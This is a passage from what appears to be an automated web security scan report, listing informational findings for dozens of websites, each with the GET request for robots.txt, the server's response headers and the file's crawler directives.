ETag: "1c4ee6-21d-8d278e80"
Accept-Ranges: bytes
Content-Length: 541
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: ia_archiver
Disallow: /

User-agent: rogerbot
Disallow: /

User-agent: *
Disallow: /filter/
Disallow: /images/
Disallow: /php/
Disallow: /redirect/
Disallow: /stats/
Disallow: /tools/
Disa
...[SNIP]...

26.383. http://www.findcontractor.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.findcontractor.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.findcontractor.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:59 GMT
Server: Apache/2.2.17
Last-Modified: Fri, 16 Feb 2007 20:04:36 GMT
ETag: "90-4299d7c213d00"
Accept-Ranges: bytes
Content-Length: 144
Connection: close
Content-Type: text/plain

User-agent: ShopWiki
Disallow: /

User-agent: psbot
Disallow: /

User-agent: BecomeBot
Disallow: /

User-agent: Mediapartners-Google*
Disallow:

26.384. http://www.findire.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.findire.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.findire.com

Response

HTTP/1.1 200 OK
Content-Length: 127
Content-Type: text/plain
Last-Modified: Wed, 29 Dec 2010 17:57:40 GMT
Accept-Ranges: bytes
ETag: "08254e281a7cb1:3a6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:44:59 GMT
Connection: close

User-agent: *
Disallow: /bin/
Disallow: http://www.findire.com/poiuy.aspx
sitemap: http://www.findire.com/sitemapindex.xml

26.385. http://www.findtuition.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.findtuition.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.findtuition.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:20:07 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Tue, 28 Apr 2009 16:04:28 GMT
ETag: "6af28-fa-9e135b00"
Accept-Ranges: bytes
Content-Length: 250
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR ADM DEV OUR BUS"
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Google*
Disallow: /loancenter_trk.php
Disallow: /loancenter_trk2.php
Disallow: /thanks.php

User-agent: *
Disallow: /loancenter_trk.php
Disallow: /loancenter_trk2.php
Disallow: /thanks.php
...[SNIP]...

26.386. http://www.firewallguide.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.firewallguide.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.firewallguide.com

Response

HTTP/1.1 200 OK
Content-Length: 27
Content-Type: text/plain
Last-Modified: Sat, 05 Mar 2011 18:00:05 GMT
Accept-Ranges: bytes
ETag: "a9fb69285fdbcb1:a2b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:33:08 GMT
Connection: close

User-agent: *
Allow: /

26.387. http://www.firstchoicepower.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.firstchoicepower.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.firstchoicepower.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:38:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Snapsis-PageBlaster: v:3.5.7;c:-;x:+;r:+
Cache-Control: public
Expires: Tue, 17 May 2011 10:38:27 GMT
Last-Modified: Wed, 30 Jun 2010 19:02:21 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 30

User-agent: *
Allow: /

26.388. http://www.firstweber.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.firstweber.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.firstweber.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:33:57 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) mod_jk/1.2.14 PHP/4.4.0-1
Last-Modified: Tue, 14 Sep 2010 00:25:00 GMT
ETag: "9366f-da-3e4cef00"
Accept-Ranges: bytes
Content-Length: 218
Vary: Accept-Encoding
Content-Type: text/plain
Via: 1.0 www.firstweber.com
Connection: close

User-agent: GoogleBot
User-agent: Slurp
User-agent: msnbot
User-agent: Teoma
Disallow:

User-agent: TruliaBot
Disallow: /

User-agent: TurnitinBot
Disallow: /

Sitemap: http://www.firstweb
...[SNIP]...

26.389. http://www.fishingnotes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fishingnotes.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fishingnotes.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:19 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 23 Feb 2009 16:51:42 GMT
ETag: "300011c8-1a-46398d126c380"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.390. http://www.fitsnews.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fitsnews.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fitsnews.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:30 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.12
X-Pingback: http://www.fitsnews.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.391. http://www.fixitnow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fixitnow.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fixitnow.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:30:50 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 08 Nov 2010 14:09:20 GMT
ETag: "1e184e5-8e-4948b2b9e4400"
Accept-Ranges: bytes
Content-Length: 142
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /?s=
Crawl-Delay: 10

# BEGIN XML-SITEMAP-PLUGIN
Sitemap: http://fixitnow.com/sitemap.xml.gz
# END XML-SITEMAP-PLUGIN

26.392. http://www.flashanywhere.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flashanywhere.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flashanywhere.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:29:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 15 May 2008 02:51:53 GMT
ETag: "43408b9-cc-44d3bfacd2440"
Accept-Ranges: bytes
Content-Length: 204
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

26.393. http://www.flektor.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flektor.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flektor.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:42:41 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "240fcb0-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

26.394. http://www.flightarrivals.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flightarrivals.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flightarrivals.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:49:28 GMT
Server: Apache/2.2.13 (Unix)
Last-Modified: Wed, 16 Dec 2009 03:08:32 GMT
ETag: "b673f-75-47acfd24e2c00"
Accept-Ranges: bytes
Content-Length: 117
Cache-Control: max-age=60
Expires: Tue, 03 May 2011 10:50:28 GMT
MS-Author-Via: DAV
Connection: close
Content-Type: text/plain

# robots.txt for www.flightarrivals.com
User-agent: Mediapartners-Google*
Disallow:
User-agent: MSNBot
Disallow:

26.395. http://www.floorplanner.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.floorplanner.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.floorplanner.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 11:36:11 GMT
Content-Type: text/plain
Connection: close
Content-Length: 223
Last-Modified: Wed, 27 Oct 2010 09:17:08 GMT
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
User-agent: *
Sitemap: http://www.floorplanner.com/sitemap.xml

Disallow: /privacypolicy
Disallow: /
...[SNIP]...

26.396. http://www.floristone.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.floristone.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.floristone.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 13 Jan 2011 04:51:30 GMT
Accept-Ranges: bytes
ETag: "86d1628bddb2cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR OUR STP STA"
Date: Tue, 03 May 2011 11:37:31 GMT
Connection: close
Content-Length: 5158

User-agent: *
Disallow: /Scripts
Disallow: /about.cfm
Disallow: /contact.cfm
Disallow: /cart.cfm
Disallow: /customer.cfm
Disallow: /search.cfm
Disallow: /privacy.cfm
Disallow: /main.cfm/
Disallow: /al
...[SNIP]...

26.397. http://www.flowerfactory.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flowerfactory.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flowerfactory.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 2590
Content-Type: text/plain
Last-Modified: Fri, 06 Feb 2009 16:15:28 GMT
Accept-Ranges: bytes
ETag: "050ee1f7688c91:1169"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:21:47 GMT
Connection: close

User-agent: *
Disallow: /ASPDNSFCommon/
Disallow: /ASPDNSFEncrypt/
Disallow: /ASPDNSFGateways/
Disallow: /ASPDNSFPatterns/
Disallow: /ASPDNSFQuickBooks/
Disallow: /bin/
Disallow: /categorydescr
...[SNIP]...

26.398. http://www.flowershopping.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flowershopping.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flowershopping.com

Response

HTTP/1.1 200 OK
Content-Length: 35
Content-Type: text/plain
Last-Modified: Tue, 04 Mar 2008 16:41:02 GMT
Accept-Ranges: bytes
ETag: "2c56e88167ec81:692"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:36:02 GMT
Connection: close

User-agent: *
Disallow: /includes/

26.399. http://www.flvsoft.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flvsoft.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flvsoft.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:30:55 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Mon, 16 Mar 2009 08:03:48 GMT
ETag: "cf479e-48-e3e6c100"
Accept-Ranges: bytes
Content-Length: 72
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /?s=
Sitemap: http://www.flvsoft.com/sitemap.xml

26.400. http://www.foodsaver.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foodsaver.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foodsaver.com

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 174
Date: Tue, 03 May 2011 11:38:19 GMT
Content-Type: text/plain
ETag: "ba64f8c86cb9c91:6c56"
Server: Microsoft-IIS/6.0
Last-Modified: Thu, 09 Apr 2009 23:42:03 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET

User-agent: *
Disallow: /App_Themes/
Disallow: /bin/
Disallow: /Controls/
Disallow: /CPCD/
Disallow: /Images/
Disallow: /Media/
Disallow: /Scripts/
Disallow: /Styles/

26.401. http://www.footballamerica.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.footballamerica.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.footballamerica.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:25 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 06 Feb 2010 12:39:44 GMT
ETag: "15d20e5-200-47eeddcd2e400"
Accept-Ranges: bytes
Content-Length: 512
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt

User-agent: *
Disallow: /admin
Disallow: /config
Disallow: /css
Disallow: /fry_include
Disallow: /global
Disallow: /includes
Disallow: /js
Disallow: /manager
Disallow: /notfound.htm
Disa
...[SNIP]...

26.402. http://www.forconstructionpros.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.forconstructionpros.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.forconstructionpros.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:19:46 GMT
Server: Apache
Last-Modified: Thu, 16 Sep 2010 16:48:43 GMT
Accept-Ranges: bytes
Content-Length: 907
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Atomz/1.0
Disallow:

User-agent: 82.165.251.120
Disallow:

User-agent: *
Disallow: /error/
Disallow: /mantis.jsp
Disallow: /admin/
Disallow: /publication/emailMag.jsp
Disallow: /publicatio
...[SNIP]...

26.403. http://www.foreclosed-government-homes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foreclosed-government-homes.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foreclosed-government-homes.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:17:26 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9
Last-Modified: Mon, 09 Nov 2009 05:58:50 GMT
ETag: "2c7081a-2b-477e9e3379a80"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /survey/
Allow: /

26.404. http://www.foreclosurelistingsnationwide.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foreclosurelistingsnationwide.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foreclosurelistingsnationwide.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:30 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 18 Oct 2010 15:02:13 GMT
ETag: "330026-269-76138740"
Accept-Ranges: bytes
Content-Length: 617
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ccbill/
Disallow: /js/
Disallow: /picture_library/
Disallow: /plesk-stat/
Disallow: /php/
Disallow: /includes/
Disallow: /gettags/
Disallow: /apility/
Disallow: /backups/
Disa
...[SNIP]...

26.405. http://www.forministry.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.forministry.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.forministry.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:42:16 GMT
Server: Apache
Last-Modified: Mon, 20 Oct 2008 18:09:19 GMT
ETag: "fe7-177-36c56079"
Accept-Ranges: bytes
Content-Length: 375
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# This is a file that search engines use to determine
# if they are not allowed to index this site.
#
# We want them to be able to index the site, so other
# than the instructions below, this fil
...[SNIP]...

26.406. http://www.formsguru.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.formsguru.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.formsguru.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:04:49 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 13 Apr 2010 18:12:29 GMT
Accept-Ranges: bytes
Content-Length: 23
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Allow: /

26.407. http://www.foundingfathers.info/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foundingfathers.info
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foundingfathers.info

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:57:04 GMT
Server: Apache
Last-Modified: Tue, 04 May 2010 16:39:57 GMT
ETag: "2b1043-5d-5c197140"
Accept-Ranges: bytes
Content-Length: 93
Connection: close
Content-Type: text/plain

User-agent: Googlebot-Image
Disallow: /

User-agent: Mediapartners-Google*
Disallow:

26.408. http://www.france3.fr/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.france3.fr
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.france3.fr

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:16:56 GMT
Server: Apache
Last-Modified: Tue, 06 Oct 2009 13:40:44 GMT
ETag: "ab2fc1-b4-47544607eef00"
Accept-Ranges: bytes
Content-Length: 180
Content-Type: text/plain; charset=iso-8859-1
Cache-Control: private, max-age=900
Age: 0
Expires: Tue, 03 May 2011 11:31:56 GMT
X-Cache-Rules: 6h - 15m
Connection: close

User-agent: *
Disallow: /cgi-bin/
Disallow: /config/
Disallow: /admin/
Disallow: /cron/
Disallow: /ecrire/
Disallow: /videos/territoires.php3
Disallow: /site-vod/territoires.php3

26.409. http://www.fraudwatchers.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fraudwatchers.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fraudwatchers.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:41 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Sun, 13 Feb 2011 08:04:40 GMT
ETag: "11b7ac0-948-49c2562135600"
Accept-Ranges: bytes
Content-Length: 2376
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-delay: 10
Disallow: /__emaildb/
Disallow: /_library/
Disallow: /_tools/
Disallow: /_vti_bin/
Disallow: /files/
Disallow: /MSOffice/
Disallow: /suspended.page/
Disallow: _i
...[SNIP]...

26.410. http://www.frbsf.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.frbsf.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.frbsf.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:39:58 GMT
Server: Apache
Last-Modified: Thu, 14 Apr 2011 21:44:39 GMT
ETag: "92-d50affc0"
Accept-Ranges: bytes
Content-Length: 146
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /fedinprint/
Disallow: /fiservices/

http://www.frbsf.org/web_sitemap_c7eafe73.xml.gz # Added by Google Sitemap Generator

26.411. http://www.free-ed.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.free-ed.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.free-ed.net

Response

HTTP/1.1 200 OK
Content-Length: 121
Content-Type: text/plain
Last-Modified: Tue, 21 Dec 2004 01:28:35 GMT
Accept-Ranges: bytes
ETag: "ecedf963fce6c41:5897"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:19:25 GMT
Connection: close

User-agent: *
Disallow: /prayer/communionchapel/*
Disallow: /prayer/freedomchapel/*
Disallow: /prayer/memorialchapel/*

26.412. http://www.free-graphics.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.free-graphics.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.free-graphics.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:13:30 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Fri, 19 Feb 2010 08:05:25 GMT
ETag: "294c132-24-8bba5b40"
Accept-Ranges: bytes
Content-Length: 36
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /

26.413. http://www.free-shit-sites.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.free-shit-sites.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.free-shit-sites.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.46
Date: Tue, 03 May 2011 10:35:23 GMT
Content-Type: text/plain
Content-Length: 136
Last-Modified: Fri, 03 Jul 2009 06:24:40 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /cgi-bin/
Disallow: /admin/
Disallow: /log/
Disallow: /sys_log/
Disallow: /cj_out.php
Disallow: /st/

26.414. http://www.freeautoshopper.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freeautoshopper.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freeautoshopper.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:35 GMT
Server: Apache/2
Last-Modified: Tue, 16 Nov 2010 02:11:54 GMT
ETag: "2ee1456-b7-49522149b6e80"
Accept-Ranges: bytes
Content-Length: 183
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /backup/
Disallow: /cache/
Disallow: /cfg/
Disallow: /control/
Disallow: /files/
Disallow: /scripts/
Disallow: /templates/
Disallow: /print/
Disallow: /email/

26.415. http://www.freeboatshopper.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freeboatshopper.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freeboatshopper.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:00:22 GMT
Server: Apache/2
Last-Modified: Tue, 16 Nov 2010 02:12:26 GMT
ETag: "2ee1561-b7-495221683b680"
Accept-Ranges: bytes
Content-Length: 183
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /backup/
Disallow: /cache/
Disallow: /cfg/
Disallow: /control/
Disallow: /files/
Disallow: /scripts/
Disallow: /templates/
Disallow: /print/
Disallow: /email/

26.416. http://www.freefever.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freefever.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freefever.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:41:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 19 Jul 2007 20:27:14 GMT
ETag: "4885cf-24-a2cb0c80"
Accept-Ranges: bytes
Content-Length: 36
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /

26.417. http://www.freegeographytools.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freegeographytools.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freegeographytools.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:55:11 GMT
Server: Apache
Last-Modified: Wed, 02 Mar 2011 03:18:04 GMT
Accept-Ranges: bytes
Content-Length: 248
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /xmlrpc
Disallow: /wp-
Disallow: /?p=
Allow: /wp-content/uploads/

SITEMAP: http://freegeographytools.com/sitemap.xml
# BEGIN XML-SITEMAP-PLUGIN
Sitemap: http://freegeographyto
...[SNIP]...

26.418. http://www.freeltcquotes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freeltcquotes.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freeltcquotes.com

Response

HTTP/1.1 200 OK
Content-Length: 260
Content-Type: *
Last-Modified: Tue, 15 Dec 2009 17:09:37 GMT
Accept-Ranges: bytes
ETag: "a81c7661a97dca1:a8bb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:53:19 GMT
Connection: close

User-agent: *
Disallow: /App_Data
Disallow: /aspnet_client
Disallow: /affiliates
Disallow: /agentmap
Disallow: /Bin
Disallow: /raw
Disallow: /Guide
Disallow: /quotes/
Disallow: /Facebook/
Di
...[SNIP]...

26.419. http://www.freemomsvideo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freemomsvideo.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freemomsvideo.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:01:29 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10
Last-Modified: Thu, 09 Apr 2009 08:45:54 GMT
ETag: "31ad6b-52-49ddb5c2"
Accept-Ranges: bytes
Content-Length: 82
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /cgi-bin/
Disallow: /img/
Disallow: /st/
Disallow: /v/

26.420. http://www.freetzi.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freetzi.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freetzi.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:53 GMT
Server: Apache
Last-Modified: Thu, 05 Apr 2007 04:38:46 GMT
ETag: "2af839-22-42d5625798180"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/

26.421. http://www.freevistafiles.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freevistafiles.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freevistafiles.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:12 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 28 Jun 2007 10:17:14 GMT
ETag: "1840007-19-433f4aa987e80"
Accept-Ranges: bytes
Content-Length: 25
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 11:35:12 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

26.422. http://www.freexpreviews.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freexpreviews.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freexpreviews.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 10:57:58 GMT
